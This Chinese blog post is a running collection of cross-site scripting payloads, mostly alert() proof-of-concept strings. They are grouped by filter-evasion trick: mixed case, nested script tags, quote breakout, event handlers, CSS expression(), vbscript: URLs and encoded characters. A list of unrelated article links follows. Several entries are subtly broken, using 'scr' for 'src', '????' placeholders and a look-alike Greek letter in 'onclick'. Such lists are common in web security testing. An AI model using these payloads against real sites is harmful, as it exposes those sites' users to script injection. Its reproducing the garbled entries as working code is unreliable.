xss-收集常用的代码
2023-02-18 16:36:44 时间
最长用的肯定是:
<script>alert("xss")</script>
DOM型一般用
<a href='#' onclick="alert(1111)">Click to see?</a>
大小写绕过
'"><sCrIpT>alert(63252)</sCrIpT>
过滤script绕过
<scr<script>ipt>alert("XXSSSS")</scr</script>ipt>
htmlentities()没有过滤单引号,直接用单引号绕过
';alert('xss');'
构造js绕过
</script><script>alert('xss')</script>
收集的其它代码
<img scr=javascript:alert("xss")></img>
http://www.example.com/MyApp.aspx?myvar= "></XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<IFRAME SRC=javascript:alert('test')></IFRAME>
" οnclick="alert(1)"
<img scr="javascript: alert(/xss/)></img>
(?用tab键弄出来的空格)
<img scr="javas????cript:alert(/xss/)" width=150></img>
<img scr="#" onerror=alert(/xss/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
(/**/ 表示注释)
<img scr="#"/* */onerror=alert(/xss/) width=150></img>
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
收集中不定时更新……
相关文章
- JAVA只要掌握内部类,多继承和单继承都不是问题
- 今儿直白的用盖房子为例,给你讲讲Java建造者模式
- 用实例带你深入理解Java内存模型
- 你知道,java项目中是如何获取文件地址的吗?
- 【架构师(第十五篇)】脚手架之创建项目模板开发
- 【架构师(第十六篇)】脚手架之创建项目模板的下载与更新
- 【架构师(第十八篇)】脚手架之项目模板的安装
- 【架构师(第十九篇)】脚手架之组件库模板开发
- 【架构师(第二十篇)】脚手架之自定义模板及第一阶段总结
- 【架构师(第二十一篇)】编辑器开发之需求分析和架构设计
- 【架构师(第二十二篇)】编辑器开发之项目整体搭建
- 【架构师(第二十三篇)】编辑器开发之画布区域组件的渲染
- 【架构师(第二十四篇)】编辑器开发之添加模版到画布
- Java异常处理:如何写出“正确”但被编译器认为有语法错误的程序
- 我以订披萨为例,给女朋友详细讲了Java设计模式的3种工厂模式
- 【架构师(第二十五篇)】编辑器开发之属性编辑区域表单渲染
- 【架构师(第二十六篇)】编辑器开发之属性编辑同步渲染
- 2021年度“CCF-腾讯犀牛鸟基金”发布结题评优结果
- 【架构师(第二十七篇)】前端单元测试框架 Jest 基础知识入门
- 太空噗|重燃太空热潮!与噗噗星人一同探索星海浪漫